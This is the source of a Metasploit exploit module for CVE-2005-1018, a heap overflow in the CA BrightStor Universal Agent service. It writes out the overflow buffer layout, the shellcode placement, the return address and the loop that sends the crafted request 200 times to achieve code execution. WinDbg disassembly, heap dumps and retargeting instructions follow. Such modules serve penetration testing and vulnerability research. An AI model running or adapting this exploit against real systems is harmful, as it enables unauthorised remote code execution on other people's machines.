1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = AverageRanking
8

9
  include Msf::Exploit::Remote::Tcp
10

11
  def initialize(info = {})
12
    super(
13
      update_info(
14
        info,
15
        'Name' => 'CA BrightStor Universal Agent Overflow',
16
        'Description' => %q{
17
          This module exploits a convoluted heap overflow in the CA
18
          BrightStor Universal Agent service. Triple userland
19
          exception results in heap growth and execution of
20
          dereferenced function pointer at a specified address.
21
        },
22
        'Author' => [ 'hdm' ],
23
        'License' => MSF_LICENSE,
24
        'References' => [
25
          [ 'CVE', '2005-1018'],
26
          [ 'OSVDB', '15471' ],
27
          [ 'BID', '13102'],
28
          [ 'URL', 'http://www.idefense.com/application/poi/display?id=232&type=vulnerabilities'],
29
        ],
30
        'Privileged' => true,
31
        'Payload' => {
32
          # 250 bytes of space (bytes 0xa5 -> 0xa8 = reversed)
33
          'Space' => 164,
34
          'BadChars' => "\x00",
35
          'StackAdjustment' => -3500,
36
        },
37
        'Platform' => %w{win},
38
        'Targets' => [
39
          [
40
            'Magic Heap Target #1',
41
            {
42
              'Platform' => 'win',
43
              'Ret' => 0x01625c44, # We grow to our own return address
44
            },
45
          ],
46
        ],
47
        'DisclosureDate' => '2005-04-11',
48
        'DefaultTarget' => 0,
49
        'Notes' => {
50
          'Reliability' => UNKNOWN_RELIABILITY,
51
          'Stability' => UNKNOWN_STABILITY,
52
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
53
        }
54
      )
55
    )
56

57
    register_options(
58
      [
59
        Opt::RPORT(6050)
60
      ]
61
    )
62
  end
63

64
  def exploit
65
    print_status("Trying target #{target.name}...")
66

67
    # The server reverses four bytes starting at offset 0xa5 :0
68

69
    # Create the overflow string
70
    boom = 'X' * 1024
71

72
    # Required field to trigger the fault
73
    boom[248, 2] = [1000].pack('V')
74

75
    # The shellcode, limited to 250 bytes (no nulls)
76
    boom[256, payload.encoded.length] = payload.encoded
77

78
    # This should point to itself
79
    boom[576, 4] = [target.ret].pack('V')
80

81
    # This points to the code below
82
    boom[580, 4] = [target.ret + 8].pack('V')
83

84
    # We have 95 bytes, use it to hop back to shellcode
85
    boom[584, 6] = "\x68" + [target.ret - 320].pack('V') + "\xc3"
86

87
    # Stick the protocol header in front of our request
88
    req = "\x00\x00\x00\x00\x03\x20\xa8\x02" + boom
89

90
    # We keep making new connections and triggering the fault until
91
    # the heap is grown to encompass our known return address. Once
92
    # this address has been allocated and filled, each subsequent
93
    # request will result in our shellcode being executed.
94

95
    1.upto(200) { |i|
96
      connect
97
      print_status("Sending request #{i} of 200...") if (i % 10) == 0
98
      sock.put(req)
99
      disconnect
100

101
      # Give the process time to recover from each exception
102
      select(nil, nil, nil, 0.1);
103
    }
104

105
    handler
106
  end
107
end
108

109

110
__END__
111
012a0d91 8b8e445c0000     mov     ecx,[esi+0x5c44]
112
012a0d97 83c404           add     esp,0x4
113
012a0d9a 85c9             test    ecx,ecx
114
012a0d9c 7407             jz      ntagent+0x20da5 (012a0da5)
115
012a0d9e 8b11             mov     edx,[ecx]         ds:0023:41327441=???????
116
012a0da0 6a01             push    0x1
117
012a0da2 ff5204           call    dword ptr [edx+0x4]
118

119
Each request will result in another chunk being allocated, the exception
120
causes these chunks to never be freed. The large chunk size allows us to
121
predict the location of our buffer and grow our buffer to where we need it.
122

123
If these addresses do not match up, run this exploit, then attach with WinDbg:
124

125
> s 0 Lfffffff 0x44 0x5c 0x61 0x01
126

127
Figure out the pattern, replace the return address, restart the service,
128
and run it through again. Only tested on WinXP SP1
129

130
011b5c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
131
011c5c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
132
011d5c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
133
011e5c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
134
011f5c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
135
01205c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
136
[ snip ]
137
01605c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
138
01615c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
139
01625c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
140
01635c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
141
01645c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
142
01655c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
143
01665c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
144
01675c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
145
01685c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
146
01695c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
147
016a5c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
148
016b5c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
149
016c5c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
150
016d5c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
151
01725c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
152
017e5c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
153

154